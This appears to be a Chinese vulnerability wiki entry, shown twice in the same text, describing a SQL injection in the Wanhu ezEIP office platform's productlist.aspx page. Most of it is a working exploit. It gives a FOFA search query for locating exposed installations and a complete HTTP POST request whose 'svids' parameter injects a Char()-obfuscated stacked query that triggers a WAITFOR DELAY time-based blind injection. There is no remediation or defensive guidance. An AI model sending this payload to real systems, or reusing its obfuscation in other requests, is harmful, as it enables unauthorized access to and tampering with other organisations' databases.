fofamini-wiki

登录白背景

源码

万户协同办公平台 ezEIP productlist存在SQL注入漏洞

一、漏洞简介

万户协同办公平台 ezEIP 是一个综合信息基础应用平台。系统完善的用户、权限、角色、对象多层分离权限管理体系，实现分站点、分栏目、分对象的分权管理体系，将站点维护工作分担到各职能部门各岗位。系统管理员负责系统基础设置与运行监控。可进行系统权限管理、站点管理、数据备份、系统参数设置、日志管理等采用ASP.NET安全技术架构，自动生成静态页面提高安全性，同时系统单机登陆许可证制度，严防黑客入侵和盗版网站，系统扩展性极强，可加装多方安全插件。万户协同办公平台 ezEIP productlist存在SQL注入漏洞

二、影响版本

万户ezEIP

三、资产测绘

fofaapp="万户网络-ezEIP"

四、漏洞复现

POST /shop/productlist.aspx HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
 
ob=price&price=asc&svids=-1%29%3BDECLARE+%40%40proc_name+VARCHAR%28301%29%3BSet+%40%40proc_name%3DChar%28115%29%252bChar%28101%29%252bChar%28108%29%252bChar%28101%29%252bChar%2899%29%252bChar%28116%29%252bChar%2832%29%252bChar%2849%29%252bChar%2832%29%252bChar%28119%29%252bChar%28104%29%252bChar%28101%29%252bChar%28114%29%252bChar%28101%29%252bChar%2832%29%252bChar%2849%29%252bChar%2861%29%252bChar%2849%29%252bChar%2832%29%252bChar%2887%29%252bChar%2865%29%252bChar%2873%29%252bChar%2884%29%252bChar%2870%29%252bChar%2879%29%252bChar%2882%29%252bChar%2832%29%252bChar%2868%29%252bChar%2869%29%252bChar%2876%29%252bChar%2865%29%252bChar%2889%29%252bChar%2832%29%252bChar%2839%29%252bChar%2848%29%252bChar%2858%29%252bChar%2848%29%252bChar%2858%29%252bChar%2853%29%252bChar%2839%29%3BEXECUTE+%28%40%40proc_name%29%3B--a%2B

POST /shop/productlist.aspx HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
 
ob=price&price=asc&svids=-1

原文: https://www.yuque.com/xiaokp7/ocvun2/gr6oi2feyfqcz4gt

# 万户协同办公平台 ezEIP productlist存在SQL注入漏洞

# 一、漏洞简介
万户协同办公平台 ezEIP 是一个综合信息基础应用平台。系统完善的用户、权限、角色、对象多层分离权限管理体系，实现分站点、分栏目、分对象的分权管理体系，将站点维护工作分担到各职能部门各岗位。系统管理员负责系统基础设置与运行监控。可进行系统权限管理、站点管理、数据备份、系统参数设置、日志管理等采用ASP.NET安全技术架构，自动生成静态页面提高安全性，同时系统单机登陆许可证制度，严防黑客入侵和盗版网站，系统扩展性极强，可加装多方安全插件。万户协同办公平台 ezEIP productlist存在SQL注入漏洞

# 二、影响版本
+ 万户ezEIP

# 三、资产测绘
+ fofa`app="万户网络-ezEIP"`

![1716537686268-203b9bc5-a9b3-4106-aa2e-3eae7290a906.png](./img/sxmOKmXFqaW6jJu1/1716537686268-203b9bc5-a9b3-4106-aa2e-3eae7290a906-234936.png)

![1716537709500-bd639a50-b0ae-4dfc-805d-af35d68f45ce.png](./img/sxmOKmXFqaW6jJu1/1716537709500-bd639a50-b0ae-4dfc-805d-af35d68f45ce-682189.png)

# 四、漏洞复现
```plain
POST /shop/productlist.aspx HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
 
ob=price&price=asc&svids=-1%29%3BDECLARE+%40%40proc_name+VARCHAR%28301%29%3BSet+%40%40proc_name%3DChar%28115%29%252bChar%28101%29%252bChar%28108%29%252bChar%28101%29%252bChar%2899%29%252bChar%28116%29%252bChar%2832%29%252bChar%2849%29%252bChar%2832%29%252bChar%28119%29%252bChar%28104%29%252bChar%28101%29%252bChar%28114%29%252bChar%28101%29%252bChar%2832%29%252bChar%2849%29%252bChar%2861%29%252bChar%2849%29%252bChar%2832%29%252bChar%2887%29%252bChar%2865%29%252bChar%2873%29%252bChar%2884%29%252bChar%2870%29%252bChar%2879%29%252bChar%2882%29%252bChar%2832%29%252bChar%2868%29%252bChar%2869%29%252bChar%2876%29%252bChar%2865%29%252bChar%2889%29%252bChar%2832%29%252bChar%2839%29%252bChar%2848%29%252bChar%2858%29%252bChar%2848%29%252bChar%2858%29%252bChar%2853%29%252bChar%2839%29%3BEXECUTE+%28%40%40proc_name%29%3B--a%2B
```

![1729186969559-26df1baa-8745-4a48-a216-d2ea2c6b64f3.png](./img/sxmOKmXFqaW6jJu1/1729186969559-26df1baa-8745-4a48-a216-d2ea2c6b64f3-047697.png)

```plain
POST /shop/productlist.aspx HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
 
ob=price&price=asc&svids=-1
```

![1729528103908-614b4255-425d-4ad8-9db4-a8387cf28817.png](./img/sxmOKmXFqaW6jJu1/1729528103908-614b4255-425d-4ad8-9db4-a8387cf28817-532959.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gr6oi2feyfqcz4gt>